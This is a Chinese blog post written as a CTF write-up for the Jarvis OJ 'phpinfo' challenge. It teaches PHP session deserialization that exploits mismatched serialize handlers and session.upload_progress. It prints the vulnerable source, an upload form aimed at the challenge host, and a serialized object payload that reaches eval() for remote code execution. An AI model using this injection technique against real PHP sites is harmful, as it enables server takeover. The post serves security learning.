

wywwzjj's Blog

Jarvis OJ phpinfo

wywwzjj's Blog

Jarvis OJ phpinfo

Writeup 反序列化

字数统计: 1.3k阅读时长: 5 min

 2019/02/25   Share

• 
• 
• 
• 
• 

从 session 角度学习反序列化

下面是题目给出的源码 原题链接

<?php
    // A webshell is wait for you
    ini_set('session.serialize_handler', 'php');
    session_start();
    class OowoO {
    	public $mdzz;
        
    	function __construct() {
    		$this->mdzz = 'phpinfo();';
    	}
    	
    	function __destruct() {
    		eval($this->mdzz);
    	}
    }
    if(isset($_GET['phpinfo'])) {
    	$m = new OowoO();
    }
    else {
    	highlight_string(file_get_contents('index.php'));
    }
?>

前言

题目直接给出了 phpinfo 信息，作为 CTF 的题来说，一定有其特别的意义。

另外，在实战中也是重要的信息泄露，不熟悉的同学可参考 phpinfo 可以告诉我们什么。

遇到这种情况，可直接拿下来与默认的 phpinfo 进行文件对比，或许可以迅速找到突破口。

困境

看到 __construct() 和 __destruct() 两个魔术方法，极有可能是反序列化的题。其中，__destruct() 中有

eval($this->mdzz);

如果 $this->mdzz 可控的话，这就是一个明显的 webshell 了，可惜 mdzz 在构造函数中就限死了，而且这里并没有变量覆盖的漏洞，否则也可以打一波，陷入困境。

有这么方便的 eval() 在这里，能不能绕过构造函数，直接执行我们需要的命令呢？

此处必有蹊跷。

ini_set('session.serialize_handler', 'php');

知识点

1.PHP Session 序列化及反序列化处理器设置使用不当带来的安全隐患

phpinfo 中可以看到，PHP 反序列化时可以使用的几种方法。

平时实验过程中，也可以用这个语句进行方法指定。

session_start([
    'serialize_handler' => 'php_serialize'
]);

在设置 session 和读取 session 两个阶段中，若使用了不同的序列化方法，将产生任意对象注入，进而导致反序列化漏洞。

$_SESSION['test'] = '|O:8:"stdClass":0:{}';

存储时使用 php_serialize --> 
a:1:{s:4:"test";s:20:"|O:8:"stdClass":0:{}";}

反序列化使用 php --> 
// var_dump($_SESSION);
array(1) {
    ["a:1:{s:4:"test";s:20:""]=>
    	object(stdClass)#1 (0) {
    }
}

PHP 获取到 session 字符串后，就开始查找第一个 |（竖线），用竖线将字符串分割成”键名”和“键值”， 并对“键值”进行反序列化。但如果这次反序列化失败，就放弃这次解析，再去找下一个竖线，执行同样的操作，直到成功。

然而到这里还是没解决 mdzz 不可控的问题，接下来引入第二个知识点。

2.上传进度支持（Upload progress in sessions）

正常用法参见 example #1，配合 Ajax 就能显示上传进度。

利用此法可达到对 session 写入数据的效果，从而使得 $mdzz 可控，可参照 有趣的 php 反序列化总结

当一个上传在处理中，同时 post 一个与 ini 设置的 session.upload_progress.name 同名变量时，php 检测到这种 post 请求时就会在 $_SESSION 中添加一组数据，所以可通过 session.upload_progress 来设置 session。

下面是部分参数说明

session.upload_progress.enabled[=1] : 是否启用上传进度报告(默认开启)
session.upload_progress.cleanup[=1] : 是否在上传完成后及时删除进度数据(默认开启, 推荐开启).
session.upload_progress.prefix[=upload_progress_] : 进度数据将存储在
_SESSION[session.upload_progress.prefix . _POST[session.upload_progress.name]]
session.upload_progress.name[=PHP_SESSION_UPLOAD_PROGRESS] :
如果 _POST[session.upload_progress.name]没有被设置, 则不会报告进度.
session.upload_progress.freq[=1%] : 更新进度的频率(已经处理的字节数), 也支持百分比表示’%’.
session.upload_progress.min_freq[=1.0] : 更新进度的时间间隔(秒级)

回到本题，查看 phpinfo

session.upload_progress.enabled = 1
session.upload_progress.cleanup = 0

即使 cleanup 开启了也问题不大，可利用持续上传进行条件竞争。

开干

构造一个表单

<!DOCTYPE html>
<html>
<body>
    <form action="http://web.jarvisoj.com:32784/index.php" method="POST" enctype="multipart/form-data">
        <input type="hidden" name="PHP_SESSION_UPLOAD_PROGRESS" value="2333" />
        <input type="file" name="file" />
        <input type="submit" value="submit" />
    </form>
</body>
</html>

如果不指定，PHP 将默认使用 “php“ 作为 session 序列化的方法，payload 及结果如下：

PS：不用纠结 Content-Type，这个对解题没有影响，重点是加入\，防止 " 被转义。

filename="|O:5:\"OowoO\":1:{s:4:\"mdzz\";s:19:\"print_r($_SESSION);\";}"

Array (
    [a:1:{s:24:"upload_progress_12312131";a:5:{s:10:"start_time";i:1551019950;s:14:"content_length";i:434;s:15:"bytes_processed";i:434;s:4:"done";b:1;s:5:"files";
     a:1:{i:0;a:7:{s:10:"field_name";s:4:"file";s:4:"name";s:55:"] 
    => OowoO Object	(
    		[mdzz] => print_r($_SESSION);
    )
)

根据 php 手册，存入 session 里的形式是这样的，由此看出 field_name 也可，所以不一定要用 filename。

$_SESSION["upload_progress_123"] = array(
    "start_time" => 1234567890,   // The request time
    "content_length" => 57343257, // POST content length
    "bytes_processed" => 453489,  // Amount of bytes received and processed
    "done" => false,              
    // true when the POST handler has finished, successfully or not
    "files" => array(
    	0 => array(
    		"field_name" => "file1",       // Name of the <input/> field
    		// The following 3 elements equals those in $_FILES
    		"name" => "foo.avi",
    		"tmp_name" => "/tmp/phpxxxxxx",
    		"error" => 0,
    		"done" => true,
            // True when the POST handler has finished handling this file
    		"start_time" => 1234567890, 
            // When this file has started to be processed
    		"bytes_processed" => 57343250, 
            // Amount of bytes received and processed for this file
    	)
    )
)

拿 flag 的老套路就不多说了，把 mdzz 里的值换成你需要执行的操作即可。

总结

知识面，决定看到的攻击面有多广。

知识链，决定发动的杀伤链有多深。

——猪猪侠

原文作者：wywwzjj

原文链接：https://wywwzjj.top/2019/02/25/Jarvis-OJ-phpinfo/

发表日期：February 25th 2019, 8:42:29 pm

更新日期：May 15th 2021, 11:53:20 am

版权声明：本文采用知识共享署名-非商业性使用 4.0 国际许可协议进行许可

• Next Post
  Jarvis OJ inject
• Previous Post
  Hackme-Web-Writeup

Powered by Hexo  theme Archer

阅读次数: : )

CATALOG

1. 1. 从 session 角度学习反序列化
   1. 1.0.1. 前言
   2. 1.0.2. 困境
   3. 1.0.3. 知识点
   4. 1.0.4. 开干
   5. 1.0.5. 总结



• Archive
• Tag
• Cate

Total : 63

2022

• 04/30Container (Docker) is Process or Virtual Machine

2021

• 03/25Java 反序列化学习

2020

• 10/10pwnable.kr
• 10/07二进制学习
• 06/23frida 初体验
• 03/22LeetCode Weekly Contest 181
• 03/22LeetCode Weekly Contest 22（双周赛）
• 03/21LeetCode 数据库专题
• 03/08LeetCode Weekly Contest 179
• 03/08LeetCode Weekly Contest 21（双周赛）
• 02/23LeetCode Weekly Contest 177
• 01/30ThinkPHP 3.X / 5.X order by 注入
• 01/24Go 学习
• 01/23PHP-FPM RCE (CVE-2019-11043)
• 01/17ThinkPHP 6.0 任意文件写入

2019

• 12/16CSAPP 并发编程 笔记
• 12/15smarty 3.1.31 RCE（CVE-2017-1000480）
• 12/02CSAPP 网络编程 笔记
• 11/25CSAPP 系统级 IO 笔记
• 11/21ThinkCMF 前台模板注入 RCE
• 11/11CSAPP 虚拟存储器 笔记
• 10/28CSAPP 异常控制流 笔记
• 10/24Python pickle 反序列化实例分析
• 10/21CSAPP 存储器层次结构 笔记
• 10/10CSAPP 程序的机器级表示 笔记
• 10/06Balsn CTF 2019 web 题
• 09/08CSAPP 信息的表示和处理 笔记
• 09/01CSAPP 计算机系统漫游 笔记
• 08/20当 PHP 反序列化遇上 SSRF
• 07/18Discuz ML! V3.X RCE
• 07/11PHP 写配置文件经典问题
• 05/18phar 与反序列化学习
• 05/17Redis 未授权访问相关利用
• 05/12命令注入总结
• 04/07vulnhub 靶机实战系列 HackInOS
• 04/04Leetcode 322.Coin Change[DP]
• 04/02无字母数字 webshell
• 03/02PHP SECURITY CALENDAR Writeup
• 03/01sqlmap tamper 列表
• 02/26Jarvis OJ inject
• 02/25Jarvis OJ phpinfo
• 02/02Hackme-Web-Writeup
• 02/02Jarvis OJ Writeup
• 02/01Prompt 1 to win
• 01/302019 fireshell web Vice
• 01/30安恒杯 一月 web
• 01/02POJ 2352 Stars[树状数组]
• 01/02POJ 2352 Stars[树状数组]

2018

• 12/302017 NJCTF web guess
• 12/30Code Breaking Writeup
• 12/22优雅实现哈夫曼编码
• 12/08Please don't stop rua 233333
• 11/30Docker-常用命令清单
• 11/23漏洞练习平台及工具
• 11/02Sqli-labs 通关笔记
• 10/28POJ 1321 棋盘问题[DFS]
• 10/28POJ 3984 迷宫问题[BFS]
• 10/23Raccoon web Writeup
• 10/02学习一项技能要花多少时间？
• 09/26Bugku Web 部分WP
• 07/28ACM 常用小 Trick
• 05/16Teach Yourself Programming in Ten Years
• 01/25Hello World

Writeup php 伪随机数 算法 ssrf 读书笔记 漏洞分析 PHP Cloud Docker Container 代码审计 SQLi 反序列化 php redis xss ThinkPHP frida smarty 渗透测试 pwn webshell 心得 命令注入 SSRF 笔记 Java SQL



缺失模块。
1、请确保node版本大于6.2
2、在博客根目录（注意不是archer根目录）执行以下命令：
npm i hexo-generator-json-content --save
3、在根目录_config.yml里添加配置：

jsonContent:
  meta: false
  pages: false
  posts:
    title: true
    date: true
    path: true
    text: false
    raw: false
    content: false
    slug: false
    updated: false
    comments: false
    link: false
    permalink: false
    excerpt: false
    categories: true
    tags: true

